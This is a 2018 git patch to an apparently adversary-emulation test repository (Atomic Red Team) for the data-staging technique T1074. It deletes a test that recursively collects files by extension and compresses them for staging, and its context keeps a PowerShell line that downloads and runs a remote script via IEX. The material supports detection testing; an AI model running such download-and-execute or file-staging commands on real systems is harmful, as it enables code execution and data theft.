From c516e8663eeede7c3d310df08a73fa44e8243370 Mon Sep 17 00:00:00 2001
From: caseysmithrc <30840394+caseysmithrc@users.noreply.github.com>
Date: Sun, 2 Sep 2018 07:07:09 -0600
Subject: [PATCH] Fixed T1074 -

---
 atomics/T1074/T1074.yaml | 81 ----------------------------------------
 1 file changed, 81 deletions(-)

diff --git a/atomics/T1074/T1074.yaml b/atomics/T1074/T1074.yaml
index 6cf634de..14c3dd2a 100644
--- a/atomics/T1074/T1074.yaml
+++ b/atomics/T1074/T1074.yaml
@@ -14,84 +14,3 @@ atomic_tests:
     name: powershell
     command: |
       powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/Discovery.bat')" > c:\windows\pi.log
-
-- name: Collect and Compress all file types
-  description: |
-    Collect all specified file extensions recursively from a specified file path on the target machine. All located files are copied into a temporary location before being compressed.
-
-  # Not sure if atomic-red supports multi-platform executors under a single attack name
-  # It would be nice to correlate (- windows: powershell executor && - linux: sh executor)
-  supported_platforms:
-    - windows
-    - linux
-
-  input_arguments:
-    extension:
-      description: Extensions to search for
-      type: String
-      default: .log
-
-  input_arguments:
-    path:
-      description: Path to recursively search from
-      type: Path
-      default: /
-
-  # Windows Payload
-  # Not sure if multi-line commands support powershell functions or if this would be better placed
-  # within an 'atomics/T1074/payload/windows-payload.ps1' file and utilize a (New-Object Net.WebClient).DownloadString
-  # to pull down the payload. (Not sure how to pass input arguments though)
-  executor:
-    name: powershell
-    command: |
-      $FolderPath = '{{ path }}'
-      $FileExtension = '{{ extension }}'
-
-      New-Item -ItemType directory -Path C:\temp\staging
-
-      function TestPath()  
-      { 
-          $FileExists = Test-Path $FolderPath 
-          If ($FileExists -eq $True)  
-          { 
-              Return $true 
-          } 
-          Else  
-          { 
-              Return $false 
-          } 
-      }
-
-      function ZipFiles()
-      {
-         Add-Type -Assembly System.IO.Compression.FileSystem
-         $compressionLevel = [System.IO.Compression.CompressionLevel]::Optimal
-         [System.IO.Compression.ZipFile]::CreateFromDirectory("C:\temp\staging",
-              "C:\temp\staging.zip", $compressionLevel, $false)
-      }
-       
-      $Result = (TestPath($FolderPath)); 
-       
-      If ($Result) 
-      { 
-          $Dir = get-childitem $FolderPath -Recurse -ErrorAction Ignore 
-          $List = $Dir | where {$_.extension -eq $FileExtension} 
-          $List | Copy-Item -Destination C:\temp\staging\ -ErrorAction Ignore
-      } 
-      else 
-      { 
-          "Folder path is incorrect." 
-      }
-
-      ZipFiles
-
-      Remove-Item -Recurse -Force C:\temp\staging
-
-  # Linux Payload
-  executor:
-    name: sh
-    command: |
-      mkdir -p /tmp/staging
-      find {{ path }} -name '*{{ extension }}' -exec cp -prv '{}' '/tmp/staging' ';'
-      tar -zcvf /tmp/staging.tar.gz /tmp/staging/
-      rm -rf /tmp/staging